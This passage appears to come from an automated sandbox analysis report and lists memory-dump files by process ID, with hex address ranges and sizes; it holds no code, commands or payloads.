memory/2460-306-0x0000000000000000-mapping.dmp
-
memory/2528-417-0x0000000000000000-mapping.dmp
-
memory/2540-282-0x0000000000000000-mapping.dmp
-
memory/2540-293-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/2628-343-0x0000027879B30000-0x0000027879BFF000-memory.dmpFilesize
828KB
-
memory/2628-340-0x0000027879AC0000-0x0000027879B2E000-memory.dmpFilesize
440KB
-
memory/2628-246-0x0000000000000000-mapping.dmp
-
memory/2812-168-0x0000000000000000-mapping.dmp
-
memory/2812-333-0x00000000024F0000-0x00000000024F9000-memory.dmpFilesize
36KB
-
memory/3060-429-0x0000000000000000-mapping.dmp
-
memory/3060-444-0x0000000002100000-0x0000000002101000-memory.dmpFilesize
4KB
-
memory/3100-375-0x0000000005370000-0x0000000005386000-memory.dmpFilesize
88KB
-
memory/3620-411-0x0000000000000000-mapping.dmp
-
memory/3704-258-0x0000000000000000-mapping.dmp
-
memory/3704-272-0x0000000000400000-0x000000000067D000-memory.dmpFilesize
2.5MB
-
memory/3708-422-0x0000000000000000-mapping.dmp
-
memory/3800-314-0x0000000000000000-mapping.dmp
-
memory/3800-318-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/3800-359-0x0000000005500000-0x0000000005B18000-memory.dmpFilesize
6.1MB
-
memory/3876-372-0x0000000002540000-0x000000000254A000-memory.dmpFilesize
40KB
-
memory/3876-149-0x0000000000000000-mapping.dmp
-
memory/3932-405-0x0000000000000000-mapping.dmp
-
memory/3952-268-0x0000000000000000-mapping.dmp
-
memory/4112-248-0x00000000013A0000-0x00000000013A2000-memory.dmpFilesize
8KB
-
memory/4112-238-0x00000000013B0000-0x00000000013C5000-memory.dmpFilesize
84KB
-
memory/4112-200-0x0000000000BD0000-0x0000000000BD1000-memory.dmpFilesize
4KB
-
memory/4112-152-0x0000000000000000-mapping.dmp
-
memory/4164-442-0x0000000004AE5000-0x0000000004AE7000-memory.dmpFilesize
8KB
-
memory/4164-397-0x0000000004AE2000-0x0000000004AE3000-memory.dmpFilesize
4KB
-
memory/4164-396-0x0000000004AE0000-0x0000000004AE1000-memory.dmpFilesize
4KB
-
memory/4164-387-0x0000000000000000-mapping.dmp
-
memory/4188-223-0x0000000000970000-0x0000000000971000-memory.dmpFilesize
4KB
-
memory/4188-240-0x00000000052C0000-0x00000000052C1000-memory.dmpFilesize
4KB
-
memory/4188-255-0x0000000005290000-0x0000000005291000-memory.dmpFilesize
4KB
-
memory/4188-257-0x0000000005240000-0x00000000052B6000-memory.dmpFilesize
472KB
-
memory/4188-169-0x0000000000000000-mapping.dmp
-
memory/4196-205-0x0000000000000000-mapping.dmp
-
memory/4204-368-0x0000000005B40000-0x0000000005B41000-memory.dmpFilesize
4KB
-
memory/4204-319-0x0000000005A90000-0x0000000005A91000-memory.dmpFilesize
4KB
-
memory/4204-364-0x0000000005B10000-0x0000000005B11000-memory.dmpFilesize
4KB
-
memory/4204-366-0x0000000005B20000-0x0000000005B21000-memory.dmpFilesize
4KB
-
memory/4204-358-0x0000000005AE0000-0x0000000005AE1000-memory.dmpFilesize
4KB
-
memory/4204-354-0x0000000005AD0000-0x0000000005AD1000-memory.dmpFilesize
4KB
-
memory/4204-290-0x00000000020A0000-0x00000000020A1000-memory.dmpFilesize
4KB
-
memory/4204-370-0x0000000005B50000-0x0000000005B51000-memory.dmpFilesize
4KB
-
memory/4204-313-0x0000000005A80000-0x0000000005A81000-memory.dmpFilesize
4KB
-
memory/4204-275-0x0000000000000000-mapping.dmp
-
memory/4204-371-0x0000000005B60000-0x0000000005B61000-memory.dmpFilesize
4KB
-
memory/4204-302-0x0000000005A50000-0x0000000005A51000-memory.dmpFilesize
4KB
-
memory/4204-363-0x0000000005B00000-0x0000000005B01000-memory.dmpFilesize
4KB
-
memory/4204-361-0x0000000005AF0000-0x0000000005AF1000-memory.dmpFilesize
4KB
-
memory/4204-367-0x0000000005B30000-0x0000000005B31000-memory.dmpFilesize
4KB
-
memory/4204-350-0x0000000005AC0000-0x0000000005AC1000-memory.dmpFilesize
4KB
-
memory/4204-347-0x0000000005AB0000-0x0000000005AB1000-memory.dmpFilesize
4KB
-
memory/4204-305-0x0000000005A60000-0x0000000005A61000-memory.dmpFilesize
4KB
-
memory/4204-338-0x0000000005AA0000-0x0000000005AA1000-memory.dmpFilesize
4KB
-
memory/4204-309-0x0000000005A70000-0x0000000005A71000-memory.dmpFilesize
4KB
-
memory/4204-288-0x00000000031C0000-0x00000000031FC000-memory.dmpFilesize
240KB
-
memory/4224-585-0x0000000004532000-0x0000000004533000-memory.dmpFilesize
4KB
-
memory/4224-583-0x0000000004530000-0x0000000004531000-memory.dmpFilesize
4KB
-
memory/4276-390-0x0000000000000000-mapping.dmp
-
memory/4332-427-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4332-419-0x0000000000000000-mapping.dmp
-
memory/4456-324-0x0000000000A90000-0x0000000000AC0000-memory.dmpFilesize
192KB
-
memory/4456-166-0x0000000000000000-mapping.dmp
-
memory/4576-572-0x0000000003110000-0x0000000003111000-memory.dmpFilesize
4KB
-
memory/4580-316-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/4580-310-0x0000000000000000-mapping.dmp
-
memory/4684-437-0x0000000000720000-0x0000000000723000-memory.dmpFilesize
12KB
-
memory/4684-426-0x0000000000000000-mapping.dmp
-
memory/4716-473-0x0000000000CA0000-0x0000000000D3D000-memory.dmpFilesize
628KB
-
memory/4716-416-0x0000000000000000-mapping.dmp
-
memory/4736-146-0x0000000003EC0000-0x0000000004071000-memory.dmpFilesize
1.7MB
-
memory/4796-201-0x0000000000250000-0x0000000000251000-memory.dmpFilesize
4KB
-
memory/4796-245-0x0000000005840000-0x0000000005841000-memory.dmpFilesize
4KB
-
memory/4796-241-0x0000000004E90000-0x0000000004E91000-memory.dmpFilesize
4KB
-
memory/4796-162-0x0000000000000000-mapping.dmp
-
memory/4796-271-0x0000000004CE0000-0x0000000005286000-memory.dmpFilesize
5.6MB
-
memory/4796-221-0x0000000005290000-0x0000000005291000-memory.dmpFilesize
4KB
-
memory/4796-267-0x0000000004E40000-0x0000000004E41000-memory.dmpFilesize
4KB
-
memory/4796-233-0x0000000004D80000-0x0000000004D81000-memory.dmpFilesize
4KB
-
memory/4924-389-0x0000000000000000-mapping.dmp
-
memory/4956-299-0x0000000005B20000-0x0000000005B21000-memory.dmpFilesize
4KB
-
memory/4956-296-0x00000000059B0000-0x00000000059B1000-memory.dmpFilesize
4KB
-
memory/4956-278-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4956-301-0x0000000005A10000-0x0000000005A11000-memory.dmpFilesize
4KB
-
memory/4956-320-0x0000000005B10000-0x0000000005B11000-memory.dmpFilesize
4KB
-
memory/4956-294-0x0000000006140000-0x0000000006141000-memory.dmpFilesize
4KB
-
memory/4956-323-0x0000000005C90000-0x0000000005C91000-memory.dmpFilesize
4KB
-
memory/4956-148-0x0000000000000000-mapping.dmp
-
memory/4968-197-0x0000000000000000-mapping.dmp
-
memory/4968-235-0x00007FFDEBC80000-0x00007FFDEBDCF000-memory.dmpFilesize
1.3MB
-
memory/4968-297-0x0000029882D30000-0x0000029882D49000-memory.dmpFilesize
100KB
-
memory/4968-208-0x0000029880F10000-0x0000029880F11000-memory.dmpFilesize
4KB
-
memory/4968-243-0x000002989B790000-0x000002989B792000-memory.dmpFilesize
8KB
-
memory/4968-300-0x0000029882D70000-0x0000029882D71000-memory.dmpFilesize
4KB
-
memory/4968-303-0x0000029882DD0000-0x0000029882DD1000-memory.dmpFilesize
4KB
-
memory/5008-147-0x0000000000000000-mapping.dmp
-
memory/5008-253-0x0000019EBD550000-0x0000019EBD61F000-memory.dmpFilesize
828KB
-
memory/5008-239-0x0000019EBD4E0000-0x0000019EBD54F000-memory.dmpFilesize
444KB
-
memory/5100-408-0x0000000000000000-mapping.dmp
-
memory/5264-601-0x0000000000400000-0x0000000000416000-memory.dmpFilesize
88KB
-
memory/5320-445-0x000000001D6E0000-0x000000001D6E2000-memory.dmpFilesize
8KB
-
memory/5320-434-0x0000000000000000-mapping.dmp
-
memory/5368-534-0x0000000000C90000-0x0000000000C92000-memory.dmpFilesize
8KB
-
memory/5368-499-0x0000000000000000-mapping.dmp
-
memory/5552-502-0x0000000000000000-mapping.dmp
-
memory/5640-550-0x0000000002910000-0x0000000002911000-memory.dmpFilesize
4KB
-
memory/5676-477-0x0000000001160000-0x0000000001162000-memory.dmpFilesize
8KB
-
memory/5676-454-0x0000000000000000-mapping.dmp
-
memory/5732-462-0x0000000000000000-mapping.dmp
-
memory/5744-524-0x0000000005250000-0x0000000005251000-memory.dmpFilesize
4KB
-
memory/6024-479-0x0000000000000000-mapping.dmp
-
memory/6132-492-0x0000000000000000-mapping.dmp